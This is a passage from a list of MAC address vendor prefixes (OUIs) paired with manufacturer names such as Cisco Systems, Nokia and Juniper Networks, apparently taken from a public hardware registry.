eMegatech International Corp. 405A9B ANOVO E06995 PEGATRON CORPORATION 84DE3D Crystal Vision Ltd D075BE Reno A&E BC6E76 Green Energy Options Ltd E828D5 Cots Technology F8DAF4 Taishan Online Technology Co., Ltd. 08D5C0 Seers Technology Co., Ltd 6C33A9 Magicjack LP 108CCF Cisco Systems, Inc D8E3AE CIRTEC MEDICAL SYSTEMS 08B7EC Wireless Seismic 18AF9F DIGITRONIC Automationsanlagen GmbH 00B342 MacroSAN Technologies Co., Ltd. 1CF5E7 Turtle Industry Co., Ltd. 980EE4 Private 447DA5 VTION INFORMATION TECHNOLOGY (FUJIAN) CO.,LTD 0CCDD3 EASTRIVER TECHNOLOGY CO., LTD. E46C21 messMa GmbH 00B033 OAO Izhevskiy radiozavod 081735 Cisco Systems, Inc C89C1D Cisco Systems, Inc E437D7 HENRI DEPAEPE S.A.S. E0A1D7 SFR 9481A4 Azuray Technologies BCE09D Eoslink 9C220E TASCAN Systems GmbH 7CDD90 Shenzhen Ogemray Technology Co., Ltd. 0C3C65 Dome Imaging Inc C8DF7C Nokia Corporation B44CC2 NR ELECTRIC CO., LTD 48CB6E Cello Electronics (UK) Ltd BC4377 Hang Zhou Huite Technology Co.,ltd. CC7669 SEETECH AC20AA DMATEK Co., Ltd. FCAF6A Qulsar Inc 346F92 White Rodgers Division 34BDF9 Shanghai WDK Industrial Co.,Ltd. CCBE71 OptiLogix BV 0C469D MS Sedco B09AE2 STEMMER IMAGING GmbH 14EE9D AirNav Systems LLC 78D004 Neousys Technology Inc. 8895B9 Unified Packet Systems Crop D8FE8F IDFone Co., Ltd. 888C19 Brady Corp Asia Pacific Ltd 448C52 KTIS CO., Ltd 006DFB Vutrix Technologies Ltd 841888 Juniper Networks 9067B5 Alcatel-Lucent E0F379 Vaddio 78B6C1 AOBO Telecom Co.,Ltd 08D29A Proformatique C89383 Embedded Automation, Inc. 78A051 iiNet Labs Pty Ltd 804F58 ThinkEco, Inc. 0475F5 CSST 8C4DEA Cerio Corporation 24BA30 Technical Consumer Products, Inc. 188ED5 TP Vision Belgium N.V. - innovation site Brugge E80C38 DAEYOUNG INFORMATION SYSTEM CO., LTD E08A7E Exponent A8B0AE LEONI E42771 Smartlabs 34DF2A Fujikon Industrial Co.,Limited 2CDD0C Discovergy GmbH 40B2C8 Nortel Networks 70A191 Trendsetter Medical, LLC 708B78 citygrow technology co., ltd 64317E Dexin Corporation 3C99F7 Lansentechnology AB 507D02 BIODIT B4A4E3 Cisco Systems, Inc 8C1F94 RF Surgical System Inc. 4491DB Shanghai Huaqin Telecom Technology Co.,Ltd 14D76E CONCH ELECTRONIC Co.,Ltd AC83F0 ImmediaTV Corporation CC6B98 Minetec Wireless Technologies 3C04BF PRAVIS SYSTEMS Co.Ltd., 94DD3F A+V Link Technologies, Corp. F44227 S & S Research Inc. C8A729 SYStronics Co., Ltd. 4454C0 Thompson Aerospace C4F464 Spica international 602A54 CardioTek B.V. BCFFAC TOPCON CORPORATION 445EF3 Tonalite Holding B.V. 68DB96 OPWILL Technologies CO .,LTD 7C55E7 YSI, Inc. 70B08C Shenou Communication Equipment Co.,Ltd C03B8F Minicom Digital Signage 20FEDB M2M Solution S.A.S. 0C8D98 TOP EIGHT IND CORP 40C7C9 Naviit Inc. 7CBB6F Cosco Electronics Co., Ltd. 94A7BC BodyMedia, Inc. C8A1B6 Shenzhen Longway Technologies Co., Ltd A8556A Pocketnet Technology Inc. B4C810 UMPI Elettronica 64A232 OOO Samlight 64FC8C Zonar Systems D0574C Cisco Systems, Inc F8DAE2 NDC Technologies 705EAA Action Target, Inc. 34F968 ATEK Products, LLC 20B0F7 Enclustra GmbH 543131 Raster Vision Ltd D0E347 Yoga F0ED1E Bilkon Bilgisayar Kontrollu Cih. Im.Ltd. C416FA Prysm Inc 506F9A Wi-Fi Alliance 842914 EMPORIA TELECOM Produktions- und VertriebsgesmbH & Co KG BC7DD1 Radio Data Comms 585076 Linear Equipamentos Eletronicos SA F0F9F7 IES GmbH & Co. KG 38580C Panaccess Systems GmbH 4451DB Raytheon BBN Technologies DCFAD5 STRONG Ges.m.b.H. 6C8D65 Wireless Glue Networks, Inc. 9803A0 ABB n.v. Power Quality Products CC43E3 Trump s.a. F8C091 Highgates Technology AC9B84 Smak Tecnologia e Automacao 90F278 Radius Gateway 806629 Prescope Technologies CO.,LTD. 241F2C Calsys, Inc. F0BDF1 Sipod Inc. 646707 Beijing Omnific Technology, Ltd. 58FD20 Bravida Sakerhet AB ACA016 Cisco Systems, Inc 58E747 Deltanet AG 404022 ZIV A85BB0 Shenzhen Dehoo Technology Co.,Ltd 44A689 PROMAX ELECTRONICA SA 40618E Stella-Green Co 68E41F Unglaube Identech GmbH 4C60D5 airPointe of New Hampshire 888717 CANON INC. 6CDC6A Promethean Limited 9055AE Ericsson, EAB/RWI/K 1010B6 McCain Inc 009363 Uni-Link Technology Co., Ltd. D4823E Argosy Technologies, Ltd. 003532 Electro-Metrics Corporation 081FF3 Cisco Systems, Inc 44376F Young Electric Sign Co 389F83 OTN Systems N.V. BC6A16 tdvine 003A9D NEC Platforms, Ltd. 28CD4C Individual Computers GmbH 8C53F7 A&D ENGINEERING CO., LTD. 7C7673 ENMAS GmbH 6C6F18 Stereotaxis, Inc. 84C727 Gnodal Ltd 087695 Auto Industrial Co., Ltd. ACCE8F HWA YAO TECHNOLOGIES CO., LTD 8C9236 Aus.Linx Technology Co., Ltd. 10C73F Midas Klark Teknik Ltd F8912A GLP German Light Products GmbH 44E49A OMNITRONICS PTY LTD 08F2F4 Net One Partners Co.,Ltd. 0C7D7C Kexiang Information Technology Co, Ltd. 3037A6 Cisco Systems, Inc DC1D9F U & B tech D8E72B NetAlly 785C72 Hioso Technology Co., Ltd. 580556 Elettronica GF S.r.L. B09074 Fulan Electronics Limited 94F692 Geminico co.,Ltd. 68EFBD Cisco Systems, Inc F02408 Talaris (Sweden) AB 8081A5 TONGQING COMMUNICATION EQUIPMENT (SHENZHEN) Co.,Ltd B482FE ASKEY COMPUTER CORP 307C30 RIM BC4E3C CORE STAFF CO., LTD. 502A8B Telekom Research and Development Sdn Bhd EC43E6 AWCER Ltd. 7812B8 ORANTEK LIMITED 98BC99 Edeltech Co.,Ltd. F02FD8 Bi2-Vision 544249 Sony Corporation 904716 RORZE CORPORATION 10445A Shaanxi Hitech Electronic Co., LTD F47626 Viltechmeda UAB 0C17F1 TELECSYS 003A9B Cisco Systems, Inc 2C3427 ERCO & GENER 80912A Lih Rong electronic Enterprise Co., Ltd. 7C2F80 Gigaset Communications GmbH 10B7F6 Plastoform Industries Ltd. 448E81 VIG 8894F9 Gemicom Technology, Inc. 502A7E Smart electronic GmbH 5C8778 Cybertelbridge co.,ltd 38BB23 OzVision America LLC 0C8411 A.O. Smith Water Products E0ABFE Orb Networks, Inc. 448312 Star-Net A05DE7 DIRECTV, Inc. 087618 ViE Technologies Sdn. Bhd. D0E40B Wearable Inc. 747E1A Red Embedded Design Limited 14A86B ShenZhen Telacom Science&Technology Co., Ltd 0CC3A7 Meritec DCE2AC Lumens Digital Optics Inc. 98D88C Nortel Networks 78192E NASCENT Technology 48EB30 ETERNA TECHNOLOGY, INC. 4C322D TELEDATA NETWORKS AC867E Create New Technology (HK) Limited Company 8C598B C Technologies AB D44CA7 Informtekhnika & Communication, LLC A8C222 TM-Research Inc. 003D41 Hatteland Computer AS CC5076 Ocom Communications, Inc. 4CC452 Shang Hai Tyd. Electon Technology Ltd. 7CCB0D Antaira Technologies, LLC C01E9B Pixavi AS 803B9A ghe-ces electronic ag 743256 NT-ware Systemprg GmbH C4E17C U2S co. 20BFDB DVL 20415A Smarteh d.o.o. A4DA3F Bionics Corp. A04025 Actioncable, Inc. 4C4B68 Mobile Device, Inc. 201257 Most Lucky Trading Ltd E8DAAA VideoHome Technology Corp. 647D81 YOKOTA INDUSTRIAL CO,.LTD 7CCFCF Shanghai SEARI Intelligent System Co., Ltd 68AAD2 DATECS LTD., A4DE50 Total Walther GmbH 1CF061 SCAPS GmbH A893E6 JIANGXI JINGGANGSHAN CKING COMMUNICATION TECHNOLOGY CO.,LTD C4AAA1 SUMMIT DEVELOPMENT, spol.s r.o. 3032D4 Hanilstm Co., Ltd. E064BB DigiView S.r.l. DC3350 TechSAT GmbH F0BCC8 MaxID (Pty) Ltd 24828A Prowave Technologies Ltd. 68CC9C Mine Site Technologies 146E0A Private 0CE709 Fox Crypto B.V. B4B5AF Minsung Electronics 04B3B6 Seamap (UK) Ltd 00270B Adura Technologies 00270D Cisco Systems, Inc 00271B Alec Sicherheitssysteme GmbH 002718 Suzhou NEW SEAUNION Video Technology Co.,Ltd 6C0F6A JDC Tech Co., Ltd. 04B466 BSP Co., Ltd. D8D67E GSK CNC EQUIPMENT CO.,LTD 0026AE Wireless Measurement Ltd 0026B1 Navis Auto Motive Systems, Inc. 0026AA Kenmec Mechanical Engineering Co., Ltd. 0026D2 Pcube Systems, Inc. 0026CD PurpleComm, Inc. 002707 Lift Complex DS, JSC 0026D7 KM Electornic Technology Co., Ltd. 0026D0 Semihalf 0026FE MKD Technology Inc. 0026A0 moblic 0026E5 AEG Power Solutions 0026E3 DTI 0026BC General Jack Technology Ltd. 002696 NOOLIX Co., Ltd 00269A Carina System Co., Ltd. 002695 ZT Group Int'l Inc 002693 QVidium Technologies, Inc. 002665 ProtectedLogic Corporation 002660 Logiways 002670 Cinch Connectors 002671 AUTOVISION Co., Ltd 002648 Emitech Corp. 002645 Circontrol S.A. 00263E Trapeze Networks 00263C Bachmann Technology GmbH & Co. KG 00263D MIA Corporation 002678 Logic Instrument SA 002677 DEIF A/S 00268E Alta Solutions, Inc. 002688 Juniper Networks 0025DA Secura Key 0025DB ATI Electronics(Shenzhen) Co., LTD 0025D5 Robonica (Pty) Ltd 0025E2 Everspring Industry Co., Ltd. 0025E1 SHANGHAI SEEYOO ELECTRONIC & TECHNOLOGY CO., LTD 00260E Ablaze Systems, LLC 002610 Apacewave Technologies 00260D Mercury Systems, Inc. 00260A Cisco Systems, Inc 002632 Instrumentation Technologies d.d. 00262E Chengdu Jiuzhou Electronic Technology Inc 00262C IKT Advanced Technologies s.r.o. 002629 Juphoon System Software Inc. 002625 MediaSputnik 002626 Geophysical Survey Systems, Inc. 0025CC Mobile Communications Korea Incorporated 0025F9 GMK electronic design GmbH 0025F7 Ansaldo STS USA 00261B LAUREL BANK MACHINES CO., LTD. 002614 KTNF 002603 Shenzhen Wistar Technology Co., Ltd 0025A6 Central Network Solution Co., Ltd. 0025AA Beijing Soul Technology Co.,Ltd. 002588 Genie Industries, Inc. 002580 Equipson S.A. 0025BD Italdata Ingegneria dell'Idea S.p.A. 0025B7 Costarelectronics, inc., 00257D PointRed Telecom Private Ltd. 0025A2 Alta Definicion LINCEO S.L. 00256D Broadband Forum 00256C Azimut Production Association JSC 002563 Luxtera Inc 002593 DatNet Informatikai Kft. 00258E The Weather Channel 0025A3 Trimax Wireless, Inc. 00259C Cisco-Linksys, LLC 0025C8 S-Access GmbH 0025C0 ZillionTV Corporation 00251B Philips CareServant 002518 Power PLUS Communications AG 002515 SFR 00250D GZT Telkom-Telmor sp. z o.o. 00250E gt german telematics gmbh 002531 Cloud Engines, Inc. 00252D Kiryung Electronics 002545 Cisco Systems, Inc 002542 Pittasoft 002536 Oki Electric Industry Co., Ltd. 002541 Maquet Critical Care AB 00252B Stirling Energy Systems 002524 Lightcomm Technology Co., Ltd 00254E Vertex Wireless Co., Ltd. 002546 Cisco Systems, Inc 002522 ASRock Incorporation 002560 Ibridge Networks & Communications Ltd. 0024B8 free alliance sdn bhd 0024B3 Graf-Syteco GmbH & Co. KG 0024F6 MIYOSHI ELECTRONICS CORPORATION 0024F0 Seanodes 0024CB Autonet Mobile 0024D1 Thomson Inc. 0024C9 Broadband Solutions Group 0024CA Tobii Technology AB 002508 Maquet Cardiopulmonary AG 0024FC QuoPin Co., Ltd. 0024FB Private 0024FA Hilger u. Kern GMBH 0024D0 Shenzhen SOGOOD Industry CO.,LTD. 0024CC Fascinations Toys and Gifts, Inc. 0024C7 Mobilarm Ltd 0024DF Digitalbox Europe GmbH 002445 Adtran Inc 00243F Storwize, Inc. 002497 Cisco Systems, Inc 0024A3 Sonim Technologies Inc 0024AA Dycor Technologies Ltd. 0024A9 Ag Leader Technology 0024A6 TELESTAR DIGITAL GmbH 00249B Action Star Enterprise Co., Ltd. 002471 Fusion MultiSystems dba Fusion-io 002474 Autronica Fire And Securirty 002446 MMB Research Inc. 002463 Phybridge Inc 002472 ReDriven Power Inc. 00241C FuGang Electronic (DG) Co.,Ltd 002419 Private 002415 Magnetic Autocontrol GmbH 0023E7 Hinke A/S 0023E2 SEA Signalisation 002425 Shenzhenshi chuangzhicheng Technology Co.,Ltd 002427 SSI COMPUTER CORP 002411 PharmaSmart LLC 00240F Ishii Tool & Engineering Corporation 0023FA RG Nets, Inc. 0023F2 TVLogic 00240A US Beverage Net 002407 TELEM SAS 002440 Halo Monitoring, Inc. 0023CF CUMMINS-ALLISON CORP. 0023C2 SAMSUNG Electronics. Co. LTD 0023C4 Lux Lumen 0023C5 Radiation Safety and Control Services Inc 0023C6 SMC Corporation 002388 V.T. Telematica S.p.a. 002386 Tour & Andersson AB 002383 InMage Systems Inc 002381 Lengda Technology(Xiamen) Co.,Ltd. 0023BF Mainpine, Inc. 0023B2 Intelligent Mechatronic Systems Inc 0023B5 ORTANA LTD 0023B9Airbus Defence and Space Deutschland GmbH 0023BD Digital Ally, Inc. 0023D5 WAREMA electronic GmbH 0023C9 Sichuan Tianyi Information Science & Technology Stock CO.,LTD 0023CE KITA DENSHI CORPORATION 0023A9 Beijing Detianquan Electromechanical Equipment Co., Ltd 0023A7 Redpine Signals, Inc. 00239B Elster Solutions, LLC 00237B WHDI LLC 002324 G-PRO COMPUTER 0023E0 INO Therapeutics LLC 002390 Algolware Corporation 002311 Gloscom Co., Ltd. 002309 Janam Technologies LLC 002304 Cisco Systems, Inc 00235D Cisco Systems, Inc 00235C Aprius, Inc. 002352 DATASENSOR S.p.A. 00232F Advanced Card Systems Ltd. 002353 F E T Elettronica snc 002342 Coffee Equipment Company 002337 Global Star Solutions ULC 002319 Sielox LLC 00236A SmartRG Inc 002331 Nintendo Co., Ltd. 002335 Linkflex Co.,Ltd 002325 IOLAN Holding 002321 Avitech International Corp 002370 Snell 0022B9 Analogix Seminconductor, Inc 0022B8 Norcott 0022B7 GSS Grundig SAT-Systems GmbH 0022B3 Sei S.p.A. 00229C Verismo Networks Inc 00229A Lastar, Inc. 0022EE Algo Communication Products Ltd 0022EA Rustelcom Inc. 0022F0 3 Greens Aviation Limited 0022EC IDEALBT TECHNOLOGY CORPORATION 0022DD Protecta Electronics Ltd 0022AB Shenzhen Turbosight Technology Ltd 00229B AverLogic Technologies, Inc. 0022BE Cisco Systems, Inc 0022BF SieAmp Group of Companies 0022DB Translogic Corporation 0022DA ANATEK, LLC 0022F9 Pollin Electronic GmbH 0022C5 INFORSON Co,Ltd. 002262 BEP Marine 00226A Honeywell 002263 Koos Technical Services, Inc. 00226C LinkSprite Technologies, Inc. 00225C Multimedia & Communication Technology 002284 DESAY A&V SCIENCE AND TECHNOLOGY CO.,LTD 002286 ASTRON 002282 8086 Consultancy 002246 Evoc Intelligent Technology Co.,Ltd. 002248 Microsoft Corporation 002290 Cisco Systems, Inc 00228A Teratronik elektronische systeme gmbh 00228E TV-NUMERIC 002254 Bigelow Aerospace 002257 3COM EUROPE LTD 002276 Triple EYE B.V. 002274 FamilyPhone AB 002236 VECTOR SP. Z O.O. 002230 FutureLogic Inc. 00222E maintech GmbH 002214 RINNAI KOREA 00220B National Source Coding Center 00220C Cisco Systems, Inc 0021EA Bystronic Laser AG 0021FD LACROIX TRAFFIC S.A.U 0021CD LiveTV 0021D0 Global Display Solutions Spa 002228 Breeze Innovations Ltd. 002229 Compumedics Ltd 002216 SHIBAURA VENDING MACHINE CORPORATION 0021E1 Nortel Networks 002200 IBM Corp 0021C6 CSJ Global, Inc. 0021C3 CORNELL Communications, Inc. 0021C7 Russound 0021C1 ABB Oy / Medium Voltage Products 0021C0 Mobile Appliance, Inc. 0021BB Riken Keiki Co., Ltd. 002166 NovAtel Inc. 002164 Special Design Bureau for Seismic Instrumentation 002160 Hidea Solutions Co. Ltd. 0021B1 DIGITAL SOLUTIONS LTD 0021B0 Tyco Telecommunications 0021AD Nordic ID Oy 00217F Intraco Technology Pte Ltd 00217D PYXIS S.R.L. 00216F SymCom, Inc. 0021A3 Micromint 0021A5 ERLPhase Power Technologies Ltd. 00219D Adesys BV 002195 GWD Media Limited 002188 EMC Corporation 00211A LInTech Corporation 002116 Transcon Electronic Systems, spol. s r. o. 002115 PHYWE Systeme GmbH & Co. KG 002141 RADLIVE 002140 EN Technologies Inc. 00213D Cermetek Microelectronics, Inc. 002111 Uniphone Inc. 002114 Hylab Technology Inc. 002132 Masterclock, Inc. 002131 Blynke Inc. 002129 Cisco-Linksys, LLC 00211D Dataline AB 002120 Sequel Technologies 002152 General Satellite Research & Development Limited 002158 Style Flying Technology Co. 002148 Kaco Solar Korea 00213C AliphCom 001FB5 I/O Interconnect Inc. 001FE7 Simet 001FDB Network Supply Corp., 001FBF Fulhua Microelectronics Corp. Taiwan Branch 001FBE Shenzhen Mopnet Industrial Co.,Ltd 001FC2 Jow Tong Technology Co Ltd 001FD2 COMMTECH TECHNOLOGY MACAO COMMERCIAL OFFSHORE LTD. 001FB8 Universal Remote Control, Inc. 001FD4 4IPNET, INC. 001FCB NIW Solutions 001FF7 Nakajima All Precision Co., Ltd. 001FEB Trio Datacom Pty Ltd 001F69 Pingood Technology Co., Ltd. 001F4D Segnetics LLC 001F81 Accel Semiconductor Corp 001F83 Teleplan Technology Services Sdn Bhd 001F9B POSBRO 001F78 Blue Fox Porini Textile 001F68 Martinsson Elektronik AB 001F63 JSC Goodwin-Europa 001FAD Brown Innovations, Inc 001FA6 Stilo srl 001F97 BERTANA srl 001F8C CCS Inc. 001F10 TOLEDO DO BRASIL INDUSTRIA DE BALANCASLTDA 001F0F Select Engineered Systems 001F02 Pixelmetrix Corporation Pte Ltd 001EFE LEVEL s.r.o. 001F1A Prominvest 001F18 Hakusan.Mfg.Co,.Ltd 001F13 S.& A.S. Ltd. 001F25 MBS GmbH 001F27 Cisco Systems, Inc 001F26 Cisco Systems, Inc 001EEF Cantronic International Limited 001EDE BYD COMPANY LIMITED 001EDD WASKO S.A. 001EDB Giken Trastem Co., Ltd. 001F42 Etherstack plc 001F35 AIR802 LLC 001F34 Lung Hwa Electronics Co., Ltd. 001EEB Talk-A-Phone Co. 001E6A Beijing Bluexon Technology Co.,Ltd 001E66 RESOL Elektronische Regelungen GmbH 001E63 Vibro-Meter SA 001E7F CBM of America 001E82 SanDisk Corporation 001EB1 Cryptsoft Pty Ltd 001EAF Ophir Optronics Ltd 001EAD Wingtech Group Limited 001ED1 Keyprocessor B.V. 001ED0 Ingespace 001E8E Hunkeler AG 001E87 Realease Limited 001ECD KYLAND Technology Co. LTD 001EBF Haas Automation Inc. 001EBC WINTECH AUTOMATION CO.,LTD. 001E6F Magna-Power Electronics, Inc. 001EA1 Brunata a/s 001E53 Further Tech Co., LTD 001E4E DAKO EDV-Ingenieur- und Systemhaus GmbH 001E49 Cisco Systems, Inc 001E28 Lumexis Corporation 001E24 Zhejiang Bell Technology Co.,ltd 001E20 Intertain Inc. 001E1C SWS Australia Pty Limited 001E12 Ecolab 001E16 Keytronix 001E32 Zensys 001E35 Nintendo Co., Ltd. 001E2B Radio Systems Design, Inc. 001E42 Teltonika 001E43 AISIN AW CO.,LTD. 001E08 Centec Networks Inc 001DFB NETCLEUS Systems Corporation 001DB9 Wellspring Wireless 001DBB Dynamic System Electronics Corp. 001DB3 HPN Supply Chain 001DB1 Crescendo Networks 001DB4 KUMHO ENG CO.,LTD 001DA4 Hangzhou System Technology CO., LTD 001D9F MATT R.P.Traczynscy Sp.J. 001D90 EMCO Flow Systems 001D93 Modacom 001D94 Climax Technology Co., Ltd 001D8E Alereon, Inc. 001DDB C-BEL Corporation 001DE6 Cisco Systems, Inc 001DE7 Marine Sonic Technology, Ltd. 001D7B Ice Energy, Inc. 001D6C ClariPhy Communications, Inc. 001DC5 Beijing Jiaxun Feihong Electricial Co., Ltd. 001DC6 SNR Inc. 001D84 Gateway, Inc. 001D85 Call Direct Cellular Solutions 001DBF Radiient Technologies, Inc. 001D34 SYRIS Technology Corp 001D32 Longkay Communication & Technology (Shanghai) Co. Ltd 001D2A SHENZHEN BUL-TECH CO.,LTD. 001D2D Pylone, Inc. 001D5B Tecvan Informática Ltda 001D5D Control Dynamics Pty. Ltd. 001D59 Mitra Energy & Infrastructure 001D2B Wuhan Pont Technology CO. , LTD 001D22 Foss Analytical A/S 001D23 SENSUS 001D3E SAKA TECHNO SCIENCE CO.,LTD 001D40Intel – GE Care Innovations LLC 001D57 CAETEC Messtechnik 001D51 Babcock & Wilcox Power Generation Group, Inc 001D4C Alcatel-Lucent 001D1A OvisLink S.A. 001CB7 USC DigiArk Corporation 001CAF Plato Networks Inc. 001CB1 Cisco Systems, Inc 001CFE Quartics Inc 001D0B Power Standards Lab 001D02 Cybertech Telecom Development 001CE9 Galaxy Technology Limited 001CEA Scientific-Atlanta, Inc 001CE7 Rocon PLC Research Centre 001CDB CARPOINT CO.,LTD 001CD5 ZeeVee, Inc. 001CBC CastGrabber, LLC 001CE4 EleSy JSC 001CE2 Attero Tech, LLC. 001CAA Bellon Pty Ltd 001CA0 Production Resource Group, LLC 001CD3 ZP Engineering SEL 001CCB Forth Corporation Public Company Limited 001C75 Segnet Ltd. 001C74 Syswan Technologies Inc. 001C68 Anhui Sun Create Electronics Co., Ltd 001C66 UCAMP CO.,LTD 001C98 LUCKY TECHNOLOGY (HK) COMPANY LIMITED 001C81 NextGen Venturi LTD 001C7A Perfectone Netware Company Ltd 001C53 Synergy Lighting Controls 001C4D Aplix IP Holdings Corporation 001C92 Tervela 001C8A Cirrascale Corporation 001C38 Bio-Rad Laboratories, Inc. 001C30 Mode Lighting (UK ) Ltd. 001C2E HPN Supply Chain 001C2A Envisacor Technologies Inc. 001C02 Pano Logic 001C05 Nonin Medical Inc. 001C06 Siemens Numerical Control Ltd., Nanjing 001BEA Nintendo Co., Ltd. 001BE5 802automation Limited 001BE4 TOWNET SRL 001C04 Airgain, Inc. 001C01 ABB Oy Drives 001BFF Millennia Media inc. 001BF2 KWORLD COMPUTER CO., LTD 001BF0 Value Platforms Limited 001C1B Hyperstone GmbH 001C10 Cisco-Linksys, LLC 001BD2 ULTRA-X ASIA PACIFIC Inc. 001B8D Electronic Computer Systems, Inc. 001B86 Bosch Access Systems GmbH 001BC2 Integrated Control Technology Limitied 001BBB RFTech Co.,Ltd 001BAA XenICs nv 001B7C A & R Cambridge 001B5D Vololink Pty Ltd 001B5A Apollo Imaging Technologies, Inc. 001B56 Tehuti Networks Ltd. 001BC6 Strato Rechenzentrum AG 001BC4 Ultratec, Inc. 001BA1 Ã…mic AB 001B96 General Sensing 001AEA Radio Terminal Systems Pty Ltd 001ADD PePWave Ltd 001AD6 JIAGNSU AETNA ELECTRIC CO.,LTD 001AD4 iPOX Technology Co., Ltd. 001B14 Carex Lighting Equipment Factory 001B15 Voxtel, Inc. 001B09 Matrix Telecom Pvt. Ltd. 001B03 Action Technology (SZ) Co., Ltd 001AFB Joby Inc. 001AFD EVOLIS 001B1E HART Communication Foundation 001B4C Signtech 001AD5 KMC CHAIN INDUSTRIAL CO., LTD. 001AD0 Albis Technologies AG 001AD3 Vamp Ltd. 001AD8 AlsterAero GmbH 001ADA Biz-2-Me Inc. 001A6F MI.TEL s.r.l. 001A71 Diostech Co., Ltd. 001A69 Wuhan Yangtze Optical Technology CO.,Ltd. 001A67 Infinite QL Sdn Bhd 001AC3 Scientific-Atlanta, Inc 001ABF TRUMPF Laser Marking Systems AG 001AB8 Anseri Corporation 001ABC U4EA Technologies Ltd 001ACB Autocom Products Ltd 001ACF C.T. ELETTRONICA 001AA3 DELORME 001A9B ADEC & Parter AG 001A9D Skipper Wireless, Inc. 001A85 NV Michel Van de Wiele 001A8E 3Way Networks Ltd 001A44 JWTrading Co., Ltd 001A49 Micro Vision Co.,LTD 001A3D Ajin Vision Co.,Ltd 001A41 INOCOVA Co.,Ltd 001A33 ASI Communications, Inc. 001A23 Ice Qube, Inc 001A1D PChome Online Inc. 001A17 Teak Technologies, Inc. 001A1C GT&T Engineering Pte Ltd 001A1F Coastal Environmental Systems 001A64 IBM Corp 001A51 Alfred Mann Foundation 001A55 ACA-Digital Corporation 0019E6 TOYO MEDIC CO.,LTD. 0019E2 Juniper Networks 0019E8 Cisco Systems, Inc 0019DF Thomson Inc. 0019DD FEI-Zyfer, Inc. 0019B2 XYnetsoft Co.,Ltd 0019A4 Austar Technology (hang zhou) Co.,Ltd 0019AA Cisco Systems, Inc 0019B1 Arrow7 Corporation 0019B3 Stanford Research Systems 001A0A Adaptive Micro-Ware Inc. 001A05 OPTIBASE LTD 0019D4 ICX Technologies 0019CF SALICRU, S.A. 0019FC PT. Ufoakses Sukses Luarbiasa 0019F4 Convergens Oy Ltd 001996 TurboChef Technologies Inc. 001997 Soft Device Sdn Bhd 001998 SATO CORPORATION 00199C CTRING 001946 Cianet Industria e Comercio S/A 001949 TENTELCOMTECH CO., LTD. 001944 Fossil Partners, L.P. 001971 Guangzhou Unicomp Technology Co.,Ltd 001964 Doorking Inc. 001976 Xipher Technologies, LLC 00196C ETROVISION TECHNOLOGY 001967 TELDAT Sp.J. 001952 ACOGITO Co., Ltd 00198B Novera Optics Korea, Inc. 001961 BlaupunktEmbedded Systems GmbH 001942 ON SOFTWARE INTERNATIONAL LIMITED 00193F RDI technology(Shenzhen) Co.,LTD 001941 Pitney Bowes, Inc 0018FD Optimal Technologies International Inc. 0018F0 JOYTOTO Co., Ltd. 0018E9 Numata Corporation 001908 Duaxes Corporation 00190C Encore Electronics, Inc. 001919 ASTEL Inc. 00192D Nokia Corporation 0018EF Escape Communications, Inc. 0018E6 Computer Hardware Design SIA 001930 Cisco Systems, Inc 001927 ImCoSys Ltd 0018F7 Kameleon Technologies 001885 Avigilon Corporation 001888 GOTIVE a.s. 00188A Infinova LLC 001886 EL-TECH, INC. 001887 Metasystem SpA 0018BE ANSA Corporation 0018BA Cisco Systems, Inc 0018B4 Dawon Media Inc. 0018B6 S3C, Inc. 0018A3 ZIPPY TECHNOLOGY CORP. 0018A0 Cierma Ascenseurs 001893 SHENZHEN PHOTON BROADBAND TECHNOLOGY CO.,LTD 0018B1 IBM Corp 00187B 4NSYS Co. Ltd. 00187F ZODIANET 00187E RGB Spectrum 00189D Navcast Inc. 0018D6 Swirlnet A/S 0018CD Erae Electronics Industry Co., Ltd 0018DB EPL Technology Ltd 0018C8 ISONAS Inc. 001849 nVent, Schroff GmbH 001846 Crypto S.A. 001845 Pulsar-Telecom LLC. 00181E GDX Technologies Ltd. 00181C Exterity Limited 001863 Veritech Electronics Limited 00185A uControl, Inc. 001852 StorLink Semiconductors, Inc. 001850 Secfone Kft 001858 TagMaster AB 001824 Kimaldi Electronics, S.L. 00183D Vertex Link Corporation 001825 Private 001879 dSys 001803 ArcSoft Shanghai Co. LTD 0017EF IBM Corp 0017F5 LIG NEOPTEK 0017CD CEC Wireless R&D Ltd. 0017D0 Opticom Communications, LLC 0017C6 Cross Match Technologies Inc 0017FE TALOS SYSTEM INC. 0017F8 Motech Industries Inc. 0017C3 KTF Technologies Inc. 0017B7 Tonze Technology Co. 0017AB Nintendo Co., Ltd. 001807 Fanstel Corp. 001808 SightLogix, Inc. 0017CE Screen Service Spa 0017DB CANKO TECHNOLOGIES INC. 0017D6 Bluechips Microhouse Co.,Ltd. 001787 Brother, Brother & Sons ApS 001789 Zenitron Corporation 001760 Naito Densei Machida MFG.CO.,LTD 001761 Private 001768 Zinwave Ltd 001769 Cymphonix Corp 001762 Solar Technology, Inc. 00178F NINGBO YIDONG ELECTRONIC CO.,LTD. 001794 Cisco Systems, Inc 00178A DARTS TECHNOLOGIES CORP. 001734 ADC Telecommunications 00172E FXC Inc. 00172B Global Technologies Inc. 001772 ASTRO Strobel Kommunikationssysteme GmbH 00173E LeucotronEquipamentos Ltda. 001798 Azonic Technology Co., LTD 001747 Trimble 00177A ASSA ABLOY AB 0016F4 Eidicom Co., Ltd. 0016E7 Dynamix Promotions Limited 0016E5 FORDLEY DEVELOPMENT LIMITED 0016E6 GIGA-BYTE TECHNOLOGY CO.,LTD. 001720 Image Sensing Systems, Inc. 00171A Winegard Company 0016C8 Cisco Systems, Inc 0016C4 SiRF Technology, Inc. 0016F3 CAST Information Co., Ltd 0016F5 Dalian Golden Hualu Digital Technology Co.,Ltd 0016F1 OmniSense, LLC 0016DD Gigabeam Corporation 00171C NT MicroSystems, Inc. 001716 Qno Technology Inc. 001726 m2c Electronic Technology Ltd. 001721 FITRE S.p.A. 0016F9 CETRTA POT, d.o.o., Kranj 00170A INEW DIGITAL COMPANY 0016BD ATI Industrial Automation 0016C0 Semtech Corporation 0016C2 Avtec Systems Inc 0016BA WEATHERNEWS INC. 0016B2 DriveCam Inc 0016B3 Photonicbridges (China) Co., Ltd. 0016AD BT-Links Company Limited 00166E Arbitron Inc. 0016AF Shenzhen Union Networks Equipment Co.,Ltd. 00169E TV One Ltd 00166A TPS 001663 KBT Mobile 00169F Vimtron Electronics Co., Ltd. 00169A Quadrics Ltd 001692 Scientific-Atlanta, Inc. 001691 Moser-Baer AG 001688 ServerEngines LLC 00168B Paralan Corporation 001682 Pro Dex, Inc 00160A SWEEX Europe BV 001602 CEYON TECHNOLOGY CO.,LTD. 001600 CelleBrite Mobile Synchronization 0015F4 Eventide 